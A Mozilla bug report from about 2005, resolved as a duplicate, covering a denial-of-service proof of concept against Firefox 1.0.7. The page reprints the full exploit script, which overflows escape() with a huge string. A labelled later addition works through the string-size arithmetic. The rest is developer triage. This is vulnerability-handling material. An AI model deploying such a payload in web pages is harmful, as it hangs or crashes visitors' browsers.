Bug 312102
Opened 19 years ago
Closed 19 years ago
Working Denial of service exploit crashes Firefox 1.07
Categories
(Core :: JavaScript Engine, defect)
RESOLVED
DUPLICATE
of bug 303213
People
(Reporter: jp.senior, Unassigned)
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7

See the following: http://www.triviasecurity.net/exploits/Mozilla_Firefox_%3C=_1.0.7_Integar_Overflow_Denial_of_Service_Exploit

Contains the source:

<html>
Copyright Georgi Guninski <br>
Cannot be used in vulnerability databases <br>
Especially securityfocus/mitre/cve/cert
<script>
// one UTF-16 code unit above U+00FF, so escape() emits "%uXXXX" for it
var s=String.fromCharCode(257);
var ki="";
var me="";
for(i=0;i<1024;i++) {ki=ki+s;}      // ki: 1024 chars
for(i=0;i<1024;i++) {me=me+ki;}     // me: 1024*1024 chars
var ov=s;
for(i=0;i<28;i++) ov += ov;         // ov: 2^28 chars
for(i=0;i<88;i++) ov += me;         // ov: 2^28 + 88*2^20 chars
alert("done generating");
var fuckbill=escape(ov);            // output is 6x the input length
alert("done escape");
alert(fuckbill);
</script>
</html>

Reproducible: Always

Steps to Reproduce:

Actual Results:
Firefox immediately locked up
I had other people test this on various OS's. This is confirmed to work.
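The following is an added example, not code from the bug report or from the exploit's author. It sizes the strings the posted script builds without allocating them, so the reader can see why the escape() step is where things go wrong: the generated string is about 360 million UTF-16 code units, and because escape() encodes U+0101 as the six-character sequence "%u0101", the escaped result would need more code units than a signed 32-bit length field can hold. The per-character expansion factor is measured with a real escape() call on a single character; the loop counts are read directly off the posted script.

```javascript
// Added example: arithmetic on the posted exploit's string sizes.
// Loop counts and the seed character are those of the posted script.
const LOOPS_DOUBLE = 28;        // for(i=0;i<28;i++) ov += ov;
const LOOPS_APPEND_ME = 88;     // for(i=0;i<88;i++) ov += me;
const ME_LEN = 1024 * 1024;     // me = 1024 copies of ki; ki = 1024 copies of s
const SEED = String.fromCharCode(257);   // U+0101, the script's "s"
const INT32_MAX = 2 ** 31 - 1;

// Length of "ov" in UTF-16 code units once generation finishes.
function generatedLength() {
  let ov = 1;                                    // ov = s
  for (let i = 0; i < LOOPS_DOUBLE; i++) ov *= 2; // ov += ov
  ov += LOOPS_APPEND_ME * ME_LEN;                // ov += me, 88 times
  return ov;
}

// Bytes "ov" occupies at two bytes per UTF-16 code unit.
function generatedBytes() {
  return generatedLength() * 2;
}

// escape() writes "%uXXXX" for any code unit >= 0x100: measure it rather
// than assume it, using the same seed character the script uses.
function escapedUnitsPerChar(ch = SEED) {
  return escape(ch).length;
}

// Length escape(ov) would have to be, in code units.
function escapedLength() {
  return generatedLength() * escapedUnitsPerChar();
}

// Would a signed 32-bit length field overflow for this many units?
function overflowsInt32(n = escapedLength()) {
  return n > INT32_MAX;
}

// Summary for a reader running this stand-alone.
function summary() {
  return {
    generatedUnits: generatedLength(),
    generatedMiB: Math.round(generatedBytes() / 2 ** 20),
    escapedUnits: escapedLength(),
    escapedOverflowsInt32: overflowsInt32(),
    generatedOverflowsInt32: overflowsInt32(generatedLength()),
  };
}

console.log(summary());
```

The input to escape() itself fits comfortably in 31 bits; only the escaped output crosses the boundary, which is consistent with the reporter seeing "done generating" but never "done escape". Current engines enforce a maximum string length and raise a RangeError well before the arithmetic reaches that point, so the check above is on the numbers, not on a live allocation.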
Comment 2•19 years ago
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20051010 Firefox/1.6a1

I don't see a crash or hang, but Firefox says "Out of memory" in the JavaScript console during the escape() step. I never see the "done escape" message. I think "Out of memory" is bogus in this case, btw.
Comment 3•19 years ago
Same with Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050914 Firefox/1.0.7.
Updated•19 years ago
Comment 4•19 years ago
With Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9a1) Gecko/20051007 Firefox/1.6a1, I get "out of memory" before it even gets to the "done generating" message.
Comment 5•19 years ago
> I think "Out of memory" is bogus in this case, btw.
Never mind. After re-reading the script I see that it is generating a
ridiculously long string.
Assignee: nobody → general
Component: Security → JavaScript Engine
Product: Firefox → Core
QA Contact: firefox → general
Version: unspecified → 1.7 Branch
Comment 6•19 years ago
(In reply to comment #1)
> I had other people test this on various OS's. This is confirmed to work.

Define "work" -- we think we fixed this in 1.0.7, see bug 303213 and bug 305190.

*** This bug has been marked as a duplicate of 303213 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE